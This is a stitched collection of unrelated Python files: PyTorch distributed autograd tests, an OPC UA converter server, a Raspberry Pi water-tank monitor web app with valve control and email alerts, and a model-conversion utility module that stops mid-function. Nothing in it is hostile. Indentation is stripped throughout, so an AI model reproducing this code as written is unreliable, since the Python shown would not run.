for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
# Call custom function in middle of backward pass to ensure all
# nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
        # Need at least one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
self.assertEqual(0, int(debug_info["local_autograd_engine_cpu_queue_size"]))
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
# Verify the gradients are same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
return rpc.rpc_sync(worker_name(dst_rank), torch.matmul, args=(t1, t2))
@dist_init
def test_nested_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
).sum()
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_multiple_backward(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
|
opcua_converter.py
|
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import argparse
BASE_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(os.path.join(BASE_DIR, 'opcua_plugin'))
sys.path.append(os.path.join(BASE_DIR, 'pyutilities'))
# sys.path.append("../opcua_plugin")
# sys.path.append("../pyutilities")
#from logservice.logservice import LogService
from security.config_security import UaSecurity
from storage.config_storage import UaStorage
from logger.ua_logger import UaLogger
import time
import logging
import json
import threading
import datetime
try:
from IPython import embed
except ImportError:
import code
def embed():
vars = globals()
vars.update(locals())
shell = code.InteractiveConsole(vars)
shell.interact()
from opcua import ua, Server
from jsonimporter import JsonImporter
from plugin_adapter import PlugInAdapter
logger = logging.getLogger()
class SubHandler(object):
"""
    Subscription handler that receives events from plugins.
"""
IDLE_WAIT = 1
HEARTBEAT_WAIT = 30
def __init__(self, server, adapter):
self.server = server
self.adapter = adapter
self.plugins = {}
self._thread = None
def loop(self):
delete_list = []
now = datetime.datetime.now()
for name, p in self.plugins.items():
if (now - p.get('last_time')).total_seconds() > self.HEARTBEAT_WAIT:
delete_list.append(name)
for d in delete_list:
self._delete_plugin(d)
def main(self):
while True:
time.sleep(self.IDLE_WAIT)
self.loop()
def run(self):
if not self._thread:
self._thread = threading.Thread(target=self.main, args=())
self._thread.setDaemon(True)
self._thread.start()
def _online(self, plugin_name):
p = self.plugins.get(plugin_name, None)
if not p: # first online.
self.plugins[plugin_name] = {
'node': None,
'last_time': datetime.datetime.now(),
}
else: # second online
node = p.get('node', None)
if not node:
now = datetime.datetime.now()
                if (now - p.get('last_time')).total_seconds() > 1:  # maybe third online
plugin_node = None
objects = self.server.get_objects_node().get_children()
for object in objects:
if object.get_display_name().to_string() != "Server":
if plugin_name in object.get_display_name().to_string():
plugin_node = object
break
if not plugin_node:
self.load_rd(plugin_name)
else:
p['node'] = plugin_node
else:
p['last_time'] = datetime.datetime.now()
def _delete_plugin(self, plugin_name):
p = self.plugins.get(plugin_name, None)
if p:
plugin_node = p.get('node', None)
if plugin_node:
self.server.delete_nodes([plugin_node, ], recursive=True)
del self.plugins[plugin_name]
def load_rd(self, plugin_name):
json_in = {'method': 'getrd'}
retcode, json_out = self.adapter.plugin_call(plugin_name, json_in)
if retcode == 0 and json_out:
logger.debug('json_out:' + json.dumps(json_out))
json_data = json.loads(json_out['data'])
file_name = '.plugin_' + plugin_name + '.json'
f = open(file_name, 'wb')
f.write(json.dumps(json_data).encode('utf-8'))
f.close()
# import some nodes from json
importer = JsonImporter(self.server, self.adapter, plugin_name)
importer.import_json(file_name)
else:
            logger.error('failed to get resource from plugin: ' + plugin_name)
def set_value(self, parent, dev_name, var_name, data, it_level=0):
if parent is None:
return
nodes = parent.get_children()
for node in nodes:
if dev_name in node.get_display_name().to_string():
sub_nodes = node.get_children()
for var in sub_nodes:
if var_name == var.get_display_name().to_string():
logger.debug(" Dev Name: " + dev_name)
logger.debug(" Var Name: " + var_name)
logger.debug(" Var Data: " + str(data))
if len(data):
var.set_value(data)
return True
return True
else:
it_level += 1
if it_level > 1 or node.get_node_class() is not ua.NodeClass.Object:
pass
elif self.set_value(node, dev_name, var_name, data, it_level) is True:
return True
return False
def datachange_notification(self, plugin_name, dev_name, var_name, data):
objects = self.server.get_objects_node().get_children()
logger.debug('datachange_notification:')
for object in objects:
if object.get_display_name().to_string() != "Server":
if plugin_name in object.get_display_name().to_string():
logger.debug("New data change Event:")
logger.debug(" Node: " + plugin_name)
self.set_value(object, dev_name, var_name, data)
def event_notification(self, plugin_name, dev_name, event_name, data):
if event_name == 'online':
self._online(plugin_name)
elif event_name == 'exit':
self._delete_plugin(plugin_name)
else:
pass
def ConfigHistoryStorage(server):
uastorage = UaStorage()
dbtype = uastorage.get_storagetype()
if dbtype == 'sqlite':
dbmodule = __import__(
'opcua.server.history_sql',
fromlist=['HistorySQLite'])
server.iserver.history_manager.set_storage(
dbmodule.HistorySQLite(uastorage.get_sqliteconfig()))
elif dbtype == 'mongo':
dbmodule = __import__('history_mongo', fromlist=['HistoryMongo'])
host, port, path = uastorage.get_mongoconfig()
server.iserver.history_manager.set_storage(
dbmodule.HistoryMongo(host, port, path))
def opcua_converter_main(options):
# setup our server
server = Server()
uasecurity = UaSecurity()
if uasecurity.get_securitytype() == 'tls':
server_cert, client_cert, private_key = uasecurity.get_certificates()
if server_cert is None:
logger.error(
'tls is enabled, but server cert is missing with current configuration')
sys.exit(-1)
if private_key is None:
logger.error(
'tls is enabled, but private key is missing with current configuration')
sys.exit(-1)
server.load_certificate(server_cert)
server.load_private_key(private_key)
ConfigHistoryStorage(server)
server.start()
# setup adapter
adapter = PlugInAdapter(options.conf_file)
handler = SubHandler(server, adapter)
handler.run()
adapter.subscription(
handler.datachange_notification,
handler.event_notification)
adapter.start()
try:
while True:
logger.debug('opcua converter running......')
time.sleep(60)
finally:
        # close connection, remove subscriptions, etc.
adapter.stop()
server.stop()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='opcua converter arguments')
parser.add_argument(
'-c',
'--conf',
dest='conf_file',
action='store',
default=None,
        help='opcua converter configuration file')
parser.add_argument(
'-l',
'--loglevel',
dest='log_level',
action='store',
default=None,
help='log level: critical/error/warning/info/debug')
parser.add_argument(
'-o',
'--output',
dest='output',
action='store',
default=None,
help='log output file with path')
parser.add_argument(
'-s',
'--console',
action="store_true",
        help='enable printing log output to the console')
(options, args) = parser.parse_known_args()
if options.conf_file:
ualogger = UaLogger(logger, options.conf_file)
else:
ualogger = UaLogger(logger)
if options.log_level:
ualogger.set_loggerlevel(options.log_level)
if options.output:
ualogger.set_loggerpath(options.output)
if options.console:
ualogger.enable_console()
ualogger.enable_logger('opcua_converter.log')
# LogService.initialize()
opcua_converter_main(options)
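# Example invocation (illustration only, not part of the original script; the paths are
# placeholders). The flags map to the argparse options defined above:
#
#   python opcua_converter.py -c /etc/opcua/converter.conf -l debug \
#       -o /var/log/opcua_converter.log -s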
|
tankmonitor.py
|
from threading import Lock, Thread
from tornado.web import Application, RequestHandler, HTTPError
from tornado.httpserver import HTTPServer
from tornado.template import Template
from tornado.ioloop import IOLoop, PeriodicCallback
from tornado.gen import coroutine
from tornado.concurrent import run_on_executor
from sockjs.tornado import SockJSRouter, SockJSConnection
import logging
from tanklogger import TankLogger, TankLogRecord, TankAlert
from functools import partial
from datetime import datetime
from time import time
from serial import Serial
from email.mime.text import MIMEText
from concurrent.futures import ThreadPoolExecutor
import smtplib
import base64
import settings as appconfig
from PIL import Image, ImageDraw, ImageFont
import pcd8544.lcd as lcd
import netifaces as ni
import wiringpi2 as wiringpi
logging.basicConfig()
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
listen_port = 4242
disp_contrast_on = 0xB0
disp_contrast_off = 0x80
disp_font = ImageFont.truetype("/usr/share/fonts/truetype/freefont/FreeMonoBold.ttf", 34)
disp_font_sm = ImageFont.truetype("/usr/share/fonts/truetype/freefont/FreeMonoBold.ttf", 9)
BTN_IN = 2 # wiringpi pin ID
BTN_OUT = 3 # wiringpi pin ID
VALVE_GPIO = 6 # wiringpi pin ID
thread_pool = ThreadPoolExecutor(2)
class EventConnection(SockJSConnection):
event_listeners = set()
def on_open(self, request):
self.event_listeners.add(self)
def on_close(self):
self.event_listeners.remove(self)
@classmethod
def notify_all(cls, msg_dict):
import json
for event_listener in EventConnection.event_listeners:
event_listener.send(json.dumps(msg_dict))
class MainPageHandler(RequestHandler):
def get(self, *args, **kwargs):
self.render('main.html')
logger_map = {
'10': 'tensec_logger',
'60': 'minute_logger',
'3600': 'hour_logger'
}
class LogDownloadHandler(RequestHandler):
def get(self, logger_interval):
fmt = self.get_argument('format', 'nvd3') # or tsv
deltas = self.get_argument('deltas', False)
logger = getattr(self.application, logger_map[logger_interval], None)
if logger:
records = logger.deltas if deltas else logger.records
if fmt == 'nvd3':
self.finish({'key': 'Tank Level',
'values': list(records)})
elif fmt == 'tsv':
self.set_header('Content-Type', 'text/plain')
if deltas:
self.write('"Timestamp"\t"Rate of Change (%s/min)"\n' % appconfig.LOG_UNIT)
else:
self.write('"Timestamp"\t"%s"\n' % appconfig.LOG_UNIT)
self.write_tsv(records)
self.finish()
def write_tsv(self, records):
for record in records:
timestamp = datetime.fromtimestamp(record.timestamp).strftime('%Y-%m-%d %H:%M:%S')
self.write(str(timestamp))
self.write('\t')
self.write(str(record.depth))
self.write('\n')
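# Example requests (illustration only, not part of the original module; host and port match the
# defaults used further below in this file):
#   GET http://localhost:4242/logger/60                     -> minute log as an nvd3 series
#   GET http://localhost:4242/logger/3600?format=tsv        -> hourly log as "Timestamp"/unit TSV
#   GET http://localhost:4242/logger/10?format=tsv&deltas=1 -> 10-second rate-of-change records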
class ValveHandler(RequestHandler):
"""Callers can use the GET method to get the status of the creek intake valve and use the
POST method to toggle the status of the creek intake valve.
In both cases the response is a json dict like so:
{
"valve": 0,
"transition_time": "2015-03-18T12:00:12"
}
Indicating the current status of the valve: 0 means that the IO pin is low (the valve is
normally-open, so the valve will be open). 1 means that the IO pin is high and the valve is
closed. transition_time is the time of the most recent state change, in the server's time
zone, or null if the transition time is not known."""
_valve_state = False
_transition_time = None
def get(self, *args, **kwargs):
self.finish(ValveHandler.get_state())
def post(self, *args, **kwargs):
auth_header = self.request.headers.get('Authorization')
if auth_header is None or not auth_header.startswith('Basic '):
self.set_status(401, reason="Valve control requires authentication")
self.set_header('WWW-Authenticate', 'Basic realm=Restricted')
self.finish()
return
else:
auth_decoded = base64.decodestring(auth_header[6:])
hdr_auth = dict()
            hdr_auth['username'], hdr_auth['password'] = auth_decoded.split(':', 1)
if hdr_auth != appconfig.CREDENTIALS:
raise HTTPError(403, reason="Valve control credentials invalid")
ValveHandler._valve_state = not ValveHandler._valve_state
ValveHandler._transition_time = datetime.now().isoformat()[:19]
wiringpi.digitalWrite(VALVE_GPIO, int(ValveHandler._valve_state))
self.finish(ValveHandler.get_state())
@staticmethod
def get_state():
return {
'valve': ValveHandler._valve_state,
'transition_time': ValveHandler._transition_time
}
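# Client sketch (illustration only, not part of the original module). It exercises the GET/POST
# contract described in the ValveHandler docstring above; the host, port and credentials are
# placeholders, and `requests` is an assumed extra dependency.
def _example_valve_client(base_url='http://localhost:4242', username='user', password='secret'):
    import requests
    # Read the current valve state (a JSON dict with 'valve' and 'transition_time').
    state = requests.get(base_url + '/valve').json()
    # Toggle the valve; the basic-auth credentials must match appconfig.CREDENTIALS on the server.
    toggled = requests.post(base_url + '/valve', auth=(username, password)).json()
    return state, toggled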
class TankMonitor(Application):
def __init__(self, handlers=None, **settings):
super(TankMonitor, self).__init__(handlers, **settings)
rate_threshold = appconfig.ALERT_RATE_THRESHOLD
self.level_threshold = appconfig.ALERT_LEVEL_THRESHOLD
self.tensec_logger = TankLogger(10, alert_rate_threshold=rate_threshold)
self.minute_logger = TankLogger(60, alert_rate_threshold=rate_threshold)
self.hour_logger = TankLogger(3600, alert_rate_threshold=rate_threshold)
self.latest_raw_val = None
self.display_expiry = 0
def log_tank_depth(self, tank_depth):
"""This method can be called from outside the app's IOLoop. It's the
only method that can be called like that"""
log.debug("Logging depth: " + str(tank_depth))
IOLoop.current().add_callback(partial(self._offer_log_record, time(),
tank_depth))
@coroutine
def _offer_log_record(self, timestamp, depth):
log_record = TankLogRecord(timestamp=timestamp, depth=depth)
if depth < self.level_threshold:
yield AlertMailer.offer(TankAlert(timestamp=timestamp, depth=depth, delta=None))
for logger in self.tensec_logger, self.minute_logger, self.hour_logger:
alert = logger.offer(log_record)
if alert:
yield AlertMailer.offer(alert)
EventConnection.notify_all({
'event': 'log_value',
'timestamp': timestamp,
'value': depth
})
def update_display(self):
ip_addr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
now = time()
if now < self.display_expiry:
im = Image.new('1', (84, 48))
draw = ImageDraw.Draw(im)
draw.text((0, 5), self.latest_raw_val, font=disp_font, fill=1)
draw.text((0, 0), ip_addr, font=disp_font_sm, fill=1)
draw.text((5, 36), "mm to surface", font=disp_font_sm, fill=1)
lcd.show_image(im)
# clean up
del draw
del im
lcd.set_contrast(disp_contrast_on)
else:
lcd.set_contrast(disp_contrast_off)
lcd.cls()
def poll_display_button(self):
btn_down = wiringpi.digitalRead(BTN_IN)
if btn_down:
self.display_expiry = time() + 60
def _set_latest_raw_val(self, val):
self.latest_raw_val = val
def set_latest_raw_val(self, val):
"""This method can be called from any thread."""
IOLoop.instance().add_callback(self._set_latest_raw_val, val)
class MaxbotixHandler():
def __init__(self, tank_monitor, **kwargs):
"""kwargs will be passed through to the serial port constructor"""
self.port_lock = Lock()
self.serial_port = None
self.set_serial_port(**kwargs)
self.stop_reading = False
self.tank_monitor = tank_monitor
self.calibrate_m = 1
self.calibrate_b = 0
def read(self):
log.info("Starting MaxbotixHandler read")
val = None
while not self.stop_reading:
try:
with self.port_lock:
val = self.serial_port.read()
if val == 'R':
val = self.serial_port.read(4)
self.tank_monitor.set_latest_raw_val(val)
self.tank_monitor.log_tank_depth(self.convert(val))
except:
print "Unable to convert value '" + str(val) + "'"
import traceback
traceback.print_exc()
def calibrate(self, m, b):
""" Defines the parameters for a linear equation y=mx+b, which is used
to convert the output of the sensor to whatever units are specified in the settings file.
"""
log.info("Calibrating Maxbotix interface with m=%2.4f, b=%2.4f" % (m, b))
self.calibrate_m = float(m)
self.calibrate_b = float(b)
def convert(self, val):
converted = self.calibrate_m * float(val) + self.calibrate_b
if log.isEnabledFor(logging.DEBUG):
log.debug("Raw value %2.4f converted to %2.4f" % (float(val), converted))
return converted
def shutdown(self):
self.stop_reading = True
def set_serial_port(self, **kwargs):
with self.port_lock:
self.serial_port = Serial(**kwargs)
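# Worked example (illustration only, not part of the original module): after calibrate(m=0.1, b=-2.0),
# a raw Maxbotix reading of "1250" is converted by convert() to 0.1 * 1250.0 + (-2.0) = 123.0
# in whatever unit appconfig.LOG_UNIT names.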
class AlertMailer(object):
last_alert = None
alert_mail = Template(open('templates/tanklevel.txt', 'rb').read())
@staticmethod
def send_message(alert_text, tank_alert):
msg = MIMEText(alert_text)
        msg['Subject'] = ("[TWUC Alert] Tank Level Warning" if not tank_alert.delta
                          else "[TWUC Alert] Tank Delta Warning")
msg['From'] = appconfig.EMAIL['sending_address']
msg['To'] = ', '.join(appconfig.EMAIL['distribution'])
conn = None
try:
conn = smtplib.SMTP(
"%s:%d" % (appconfig.EMAIL['smtp_server'], appconfig.EMAIL['smtp_port']))
if appconfig.EMAIL['smtp_tls']:
conn.starttls()
conn.login(appconfig.EMAIL['sending_address'], appconfig.EMAIL['sending_password'])
conn.sendmail(appconfig.EMAIL['sending_address'], appconfig.EMAIL['distribution'],
msg.as_string())
finally:
if conn:
conn.quit()
@staticmethod
@coroutine
def offer(tank_alert):
offer_time = time()
if AlertMailer.last_alert is None or \
(offer_time - AlertMailer.last_alert) > appconfig.EMAIL['period']:
alert_text = AlertMailer.alert_mail.generate(alert=tank_alert)
log.warn("Sending e-mail alert due to " + str(tank_alert))
log.warn(alert_text)
AlertMailer.last_alert = offer_time
yield thread_pool.submit(lambda: AlertMailer.send_message(alert_text, tank_alert))
if __name__ == "__main__":
event_router = SockJSRouter(EventConnection, '/event')
handlers = [
(r'/', MainPageHandler),
(r'/logger/(.*)', LogDownloadHandler), # arg is log interval
(r'/valve', ValveHandler)
]
handlers += event_router.urls
tornado_settings = {
'static_path': 'static',
'template_path': 'templates',
'debug': True
}
lcd.init()
lcd.gotoxy(0, 0)
lcd.set_contrast(disp_contrast_on)
lcd.cls()
lcd.text("LCD Init")
wiringpi.pinMode(BTN_OUT, 1)
wiringpi.digitalWrite(BTN_OUT, 1)
wiringpi.pinMode(VALVE_GPIO, 1)
wiringpi.digitalWrite(VALVE_GPIO, 0)
wiringpi.pinMode(BTN_IN, 0)
app = TankMonitor(handlers, **tornado_settings)
maxbotix = MaxbotixHandler(tank_monitor=app, port='/dev/ttyAMA0', timeout=10)
maxbotix.calibrate(appconfig.MAXBOTICS['calibrate_m'],
appconfig.MAXBOTICS['calibrate_b'])
ioloop = IOLoop.instance()
disp_print_cb = PeriodicCallback(app.update_display, callback_time=500, io_loop=ioloop)
disp_print_cb.start()
button_poll_cb = PeriodicCallback(app.poll_display_button, callback_time=100, io_loop=ioloop)
button_poll_cb.start()
http_server = HTTPServer(app)
http_server.listen(listen_port)
log.info("Listening on port " + str(listen_port))
maxbotix_thread = Thread(target=maxbotix.read)
maxbotix_thread.daemon = True
maxbotix_thread.start()
ioloop.start()
|
utils.py
|
#----------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#----------------------------------------------------------------------------------------------
from __future__ import division
import os
import sys
import numpy as np
from six import text_type, binary_type, integer_types
import ox.common.IR.graph_pb2 as graph_pb2
__all__ = ["assign_IRnode_values", "convert_onnx_pad_to_tf", 'convert_tf_pad_to_onnx',
'compute_tf_same_padding', 'is_valid_padding', 'download_file',
'shape_to_list', 'list_to_shape']
def assign_attr_value(attr, val):
    '''Assign value to AttrValue proto according to data type.'''
    from ox.common.IR.graph_pb2 import TensorShape
if isinstance(val, bool):
attr.b = val
elif isinstance(val, integer_types):
attr.i = val
elif isinstance(val, float):
attr.f = val
elif isinstance(val, binary_type) or isinstance(val, text_type):
if hasattr(val, 'encode'):
val = val.encode()
attr.s = val
elif isinstance(val, TensorShape):
attr.shape.MergeFromString(val.SerializeToString())
elif isinstance(val, list):
if not val: return
if isinstance(val[0], integer_types):
attr.list.i.extend(val)
elif isinstance(val[0], TensorShape):
attr.list.shape.extend(val)
elif isinstance(val[0], float):
attr.list.f.extend(val)
else:
raise NotImplementedError('AttrValue cannot be of list[{}].'.format(val[0]))
elif isinstance(val, np.ndarray):
assign_attr_value(attr, val.tolist())
else:
pass
# raise NotImplementedError('AttrValue cannot be of %s' % type(val))
def assign_IRnode_values(IR_node, val_dict):
for name, val in val_dict.items():
assign_attr_value(IR_node.attr[name], val)
# For padding
def convert_tf_pad_to_onnx(pads):
pads = np.reshape(pads, -1).tolist()
dims = len(pads)
assert dims % 2 == 0
ret = []
for idx in range(0, dims, 2):
ret.append(pads[idx])
for idx in range(1, dims, 2):
ret.append(pads[idx])
return ret
def convert_onnx_pad_to_tf(pads):
return np.transpose(np.array(pads).reshape([2, -1])).reshape(-1, 2).tolist()
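# Worked example (illustration only, not part of the original module): TensorFlow-style pads
# [[0, 0], [1, 2], [1, 2], [0, 0]] flatten to [0, 1, 1, 0, 0, 2, 2, 0] via convert_tf_pad_to_onnx
# (all "begin" values first, then all "end" values); convert_onnx_pad_to_tf reverses the layout
# back to per-dimension [begin, end] pairs.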
def is_valid_padding(pads):
return sum(np.reshape(pads, -1)) == 0
def shape_to_list(shape):
return [dim.size for dim in shape.dim]
def list_to_shape(shape):
ret = graph_pb2.TensorShape()
for dim in shape:
new_dim = ret.dim.add()
new_dim.size = dim
return ret
def compute_tf_same_padding(input_shape, kernel_shape, strides, data_format='NHWC'):
""" Convert [SAME] padding in tensorflow, keras to onnx pads,
i.e. [x1_begin, x2_begin...x1_end, x2_end,...] """
# print (input_shape)
# print (kernel_shape)
# print (strides)
if data_format.startswith('NC'):
# Not tested
input_shape = input_shape[2:]
remove_dim = len(strides) - len(input_shape)
if remove_dim > 0:
strides = strides[remove_dim::]
else:
input_shape = input_shape[1:-1]
remove_dim = len(input_shape) - len(strides) + 1
if remove_dim < 0:
strides = strides[1:remove_dim]
# print (input_shape)
# print (kernel_shape)
# print (strides)
up_list = [0]
down_list = [0]
for idx in range(0, len(input_shape)):
# kernel_shape[idx] = (kernel_shape[idx] - 1) * dilation_rate + 1
output_shape = (input_shape[idx] + strides[idx] - 1) // strides[idx]
this_padding = (output_shape - 1) * strides[idx] + kernel_shape[idx] - input_shape[idx]
this_padding = max(0, this_padding)
up_list.append(this_padding // 2)
down_list.append(this_padding - this_padding // 2)
# print ([0] + up_list + [0] + down_list if data_format.startswith('NC') else up_list + [0] + down_list + [0])
# print ('-----------------------------------------------------')
return [0] + up_list + [0] + down_list if data_format.startswith('NC') else up_list + [0] + down_list + [0]
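# Worked example (illustration only, not part of the original module): for an NHWC input of shape
# [1, 224, 224, 3] with kernel_shape [7, 7] and strides [1, 2, 2, 1], each spatial dimension needs
# (112 - 1) * 2 + 7 - 224 = 5 total padding, split 2 before / 3 after, so
# compute_tf_same_padding([1, 224, 224, 3], [7, 7], [1, 2, 2, 1]) returns [0, 2, 2, 0, 0, 3, 3, 0].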
# network library
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f %s%s" % (num, 'Yi', suffix)
def _progress_check(count, block_size, total_size):
read_size = count * block_size
read_size_str = sizeof_fmt(read_size)
if total_size > 0:
percent = int(count * block_size * 100 / total_size)
percent = min(percent, 100)
sys.stdout.write("\rprogress: {} downloaded, {}%.".format(read_size_str, percent))
if read_size >= total_size:
sys.stdout.write("\n")
else:
sys.stdout.write("\rprogress: {} downloaded.".format(read_size_str))
sys.stdout.flush()
def _single_thread_download(url, file_name):
from six.moves import urllib
result, _ = urllib.request.urlretrieve(url, file_name, _progress_check)
return result
def _downloader(start, end, url, filename):
import requests
